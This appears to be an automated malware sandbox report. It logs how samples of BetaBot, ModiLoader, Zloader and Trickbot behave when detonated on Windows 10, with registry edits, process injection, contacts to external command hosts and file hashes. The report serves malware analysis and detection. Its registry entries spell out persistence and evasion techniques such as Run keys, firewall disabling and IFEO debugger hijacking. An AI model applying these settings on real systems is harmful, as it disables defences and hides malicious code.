| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\vir1.xlsx"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
Files
memory/3628-9-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-14-0x00007FFBF40B0000-0x00007FFBF40C0000-memory.dmp
memory/3628-15-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-17-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-20-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-22-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-23-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-21-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-19-0x00007FFBF40B0000-0x00007FFBF40C0000-memory.dmp
memory/3628-18-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-16-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-13-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-12-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-11-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-10-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-8-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-7-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-6-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp
memory/3628-5-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-4-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp
memory/3628-3-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp
memory/3628-2-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp
memory/3628-1-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp
memory/3628-0-0x00007FFC36A2D000-0x00007FFC36A2E000-memory.dmp
memory/3628-37-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-36-0x00007FFC36A2D000-0x00007FFC36A2E000-memory.dmp
memory/3628-38-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
memory/3628-39-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | a3d40cd6b1d8d8d967cce990c9d9b142 |
| SHA1 | 4c6b928012262b9f4d8bd1685fe982623a00d484 |
| SHA256 | 9408df4c41dc131f32be525e423f536b8f6b77bc4f1e488cc3ee6468a3ef0935 |
| SHA512 | 3c6187c3ea71cf5fdd9573c30d03f8f315894d14993bdfb1891e1ef8c993372d28a485ca51f14c0db273c62cff856027239e70006bdecf0be0299010536a8a59 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
152s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\6F4B627D74491845150070\\6F4B627D74491845150070.exe" | C:\Users\Admin\AppData\Local\Temp\eupdate.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\eupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\eupdate.exe | N/A |
Modifies Internet Explorer Protected Mode
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
Modifies Internet Explorer Protected Mode Banner
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth = "0" | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\eupdate.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\eupdate.exe
"C:\Users\Admin\AppData\Local\Temp\eupdate.exe"
C:\Users\Admin\AppData\Local\Temp\eupdate.exe
"eupdate.exe"
C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
"C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe"
C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
"6F4B627D74491845150070.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| RU | 62.113.117.136:80 | tcp | |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| RU | 62.113.117.136:80 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
Files
memory/3516-0-0x0000000074BE2000-0x0000000074BE3000-memory.dmp
memory/3516-1-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3516-2-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3640-5-0x0000000000400000-0x000000000040F000-memory.dmp
memory/3640-7-0x0000000000400000-0x000000000040F000-memory.dmp
memory/3640-4-0x0000000000400000-0x000000000040F000-memory.dmp
memory/3640-3-0x0000000000400000-0x000000000040F000-memory.dmp
memory/3516-13-0x0000000074BE0000-0x0000000075191000-memory.dmp
C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
| MD5 | ccfaeed043685c189ef498c3c6f675e7 |
| SHA1 | 6973b66e83db7f6d9ba957a6f9cca60a4983f0e8 |
| SHA256 | 5d81fc6ab3e6c7bd353ee53297478fc10abfc7f851359f81a65dea74c70156ff |
| SHA512 | ab8f2d33ec8300d87423f53243f45b720e27d59ab7839d7dcb9d37572c1f4e34536221bfda25dee939218475f44915cac2cf4e9270881af15f53d916bd9dc204 |
memory/2296-16-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/2296-17-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/1008-24-0x0000000000400000-0x000000000040F000-memory.dmp
memory/2296-25-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/2296-15-0x0000000074BE2000-0x0000000074BE3000-memory.dmp
memory/3640-12-0x0000000000400000-0x000000000040F000-memory.dmp
memory/1008-26-0x0000000000400000-0x000000000040F000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
152s
Command Line
Signatures
BetaBot
Betabot family
ModiLoader, DBatLoader
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
Modiloader family
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ai3owwq7y.exe | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ai3owwq7y.exe\DisableExceptionChainValidation | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "fzpxnnw.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\ai3owwq7y.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\ai3owwq7y.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
Indicator Removal: Clear Persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ai3owwq7y.exe\DisableExceptionChainValidation | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5088 set thread context of 2740 | N/A | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode Banner
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe
"C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe"
C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe
"C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5112 -ip 5112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 1080
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
Files
memory/2740-2-0x0000000000400000-0x0000000000435000-memory.dmp
memory/5088-4-0x0000000000400000-0x000000000049F000-memory.dmp
memory/2740-6-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2740-7-0x00000000022A0000-0x0000000002306000-memory.dmp
memory/2740-3-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2740-0-0x0000000000400000-0x0000000000435000-memory.dmp
memory/5112-9-0x00000000006D0000-0x0000000000B04000-memory.dmp
memory/5112-11-0x00000000006D0000-0x0000000000B04000-memory.dmp
memory/5112-12-0x0000000000E00000-0x0000000000F02000-memory.dmp
memory/5112-14-0x00000000006D0000-0x0000000000B03000-memory.dmp
memory/2740-18-0x0000000002800000-0x0000000002801000-memory.dmp
memory/5112-19-0x0000000002F10000-0x0000000002F12000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
90s
Max time network
159s
Command Line
Signatures
Zloader family
Zloader, Terdot, DELoader, ZeusSphinx
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1352 wrote to memory of 4328 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1352 wrote to memory of 4328 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1352 wrote to memory of 4328 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\senate.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\senate.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/4328-2-0x0000000000CE0000-0x0000000000D09000-memory.dmp
memory/4328-1-0x0000000000D70000-0x0000000000D9C000-memory.dmp
memory/4328-0-0x0000000000CE0000-0x0000000000D09000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
136s
Max time network
146s
Command Line
Signatures
Trickbot
Trickbot family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wermgr.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5016 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe | C:\Windows\system32\wermgr.exe |
| PID 5016 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe | C:\Windows\system32\wermgr.exe |
| PID 5016 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe | C:\Windows\system32\wermgr.exe |
| PID 5016 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe | C:\Windows\system32\wermgr.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe
"C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe"
C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5016 -ip 5016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 704
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.81.91.in-addr.arpa | udp |
| MD | 185.163.47.157:443 | tcp | |
| US | 195.123.240.40:443 | tcp | |
| US | 195.123.240.40:443 | tcp | |
| US | 195.123.240.40:443 | tcp | |
| US | 8.8.8.8:53 | 40.240.123.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 195.123.240.40:443 | tcp | |
| US | 195.123.240.40:443 | tcp | |
| US | 195.123.240.40:443 | tcp | |
| US | 195.123.240.40:443 | tcp | |
| US | 195.123.240.40:443 | tcp | |
| US | 195.123.240.40:443 | tcp |
Files
memory/5016-6-0x00000000024D0000-0x000000000250A000-memory.dmp
memory/5016-5-0x00000000024D0000-0x000000000250A000-memory.dmp
memory/5016-4-0x0000000002410000-0x000000000244C000-memory.dmp
memory/5016-0-0x0000000002490000-0x00000000024CE000-memory.dmp
memory/5016-42-0x0000000002510000-0x00000000025F3000-memory.dmp
memory/5016-43-0x00000000024D0000-0x000000000250A000-memory.dmp
memory/5016-179-0x0000000010000000-0x0000000010003000-memory.dmp
memory/5016-178-0x00000000008F0000-0x00000000008F1000-memory.dmp
memory/1096-182-0x0000023A8A8B0000-0x0000023A8A8B1000-memory.dmp
memory/1096-181-0x0000023A8A710000-0x0000023A8A738000-memory.dmp
memory/5016-183-0x0000000002510000-0x00000000025F3000-memory.dmp
memory/5016-184-0x00000000024D0000-0x000000000250A000-memory.dmp
memory/1096-185-0x0000023A8A710000-0x0000023A8A738000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
90s
Max time network
158s
Command Line
Signatures
Zloader family
Zloader, Terdot, DELoader, ZeusSphinx
Adds Run key to start application
| Description | Indicator | Process | Target |
